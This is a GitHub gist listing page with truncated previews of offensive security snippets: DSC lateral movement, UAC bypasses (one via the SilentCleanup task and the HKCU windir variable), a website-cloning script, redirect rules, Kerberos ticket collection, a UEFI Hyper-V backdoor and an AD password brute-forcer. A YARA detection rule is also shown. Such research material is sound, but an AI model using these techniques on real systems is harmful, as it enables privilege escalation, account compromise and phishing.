Skip to content

Instantly share code, notes, and snippets.


James Hovious JamesHovious

View GitHub Profile
View PowerShellDSCLateralMovement.ps1
# This idea originated from this blog post on Invoke DSC Resources directly:
$MOFContents = @'
instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref
ResourceID = "[Script]ScriptExample";
GetScript = "\"$(Get-Date): I am being GET\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
TestScript = "\"$(Get-Date): I am being TESTED\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
makelariss /
Last active Jun 17, 2021
Tested on Microsoft Windows [Version 10.0.16299.248]
# -*- coding: utf-8 -*-
# All credits go to
SilentCleanup has a "Highest" RunLevel meaning it will elevate the scheduled task to administrator without any prompting.
It also contains enviroment variables in the path set on "Execute" (%windir%\system32\cleanmgr.exe), the Enviroment variables are stored in the HKCU registry hive which is write accesible by a user. (HKCU\Environment)
We can perform a AlwaysNotify UAC Bypass by changing the enviroment variable's 'windir' value to our own payload and triggering it through the SilentCleanup scheduled task.
from _winreg import *
HKCU = ConnectRegistry(None, HKEY_CURRENT_USER)
Mr-Un1k0d3r /
Created Nov 7, 2017
Lazy website cloning
echo "Cloning $1"
wget $1 -O index.html &> /dev/null
TAG="<base href=\"$1\"/></head>"
sed '/<\/head>/i\'"$TAG" index.html | tee index.html &> /dev/null
echo "index.html was saved and modified"
mattifestation / WDAG_CI_Policy.xml
Created Oct 18, 2017
Recovered Windows Defender Application Guard Hyper-V Container Code Integrity Policy
View WDAG_CI_Policy.xml
<?xml version="1.0"?>
<SiPolicy xmlns:xsd="" xmlns:xsi="" xmlns="urn:schemas-microsoft-com:sipolicy">
curi0usJack / .htaccess
Last active Aug 2, 2022
View .htaccess
# TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__!
# Note this version requires Apache 2.4+
# Save this file into something like /etc/apache2/redirect.rules.
# Then in your site's apache conf file (in /etc/apache2/sites-avaiable/), put this statement somewhere near the bottom
# Include /etc/apache2/redirect.rules
jaredcatkinson / Get-KerberosTicketGrantingTicket.ps1
Last active Jun 9, 2022
Kerberos Ticket Granting Ticket Collection Script and Golden Ticket Detection Tests
View Get-KerberosTicketGrantingTicket.ps1
function Get-KerberosTicketGrantingTicket
Gets the Kerberos Tickets Granting Tickets from all Logon Sessions
Get-KerberosTicketGrantingTicket uses the Local Security Authority (LSA) functions to enumerate Kerberos logon sessions and return their associate Kerberos Ticket Granting Tickets.
williballenthin / stackstrings.yara
Last active Nov 1, 2021
match x86 that appears to be stack string creation
View stackstrings.yara
rule stack_strings
author = "William Ballenthin"
email = ""
license = "Apache 2.0"
copyright = "FireEye, Inc"
description = "Match x86 that appears to be stack string creation."
Cr4sh / DmaHvBackdoor.c
Last active Jul 29, 2022
Hyper-V backdoor for UEFI
View DmaHvBackdoor.c
Part of UEFI DXE driver code that injects Hyper-V VM exit handler
backdoor into the Device Guard enabled Windows 10 Enterprise.
Execution starts from new_ExitBootServices() -- a hook handler
for EFI_BOOT_SERVICES.ExitBootServices() which being called by
winload!OslFwpKernelSetupPhase1(). After DXE phase exit winload.efi
transfers exeution to previously loaded Hyper-V kernel (hvix64.sys)
ropnop /
Last active Jun 6, 2021
A quick tool to bruteforce an AD user's password by requesting TGTs from the Domain Controller with 'kinit'
# Title:
# Author: @ropnop
# Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller
# The script configures the realm and KDC for you based on the domain provided and the domain controller
# Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf
# Only tested with Heimdal kerberos (error messages might be different for MIT clients)
# Note: this *will* lock out accounts if a domain lockout policy is set. Be careful
View bypass_uac.ps1
# Powershell script to bypass UAC on Vista+ assuming
# there exists one elevated process on the same desktop.
# Technical details in:
# You need to Install-Module NtObjectManager for this to run.
Import-Module NtObjectManager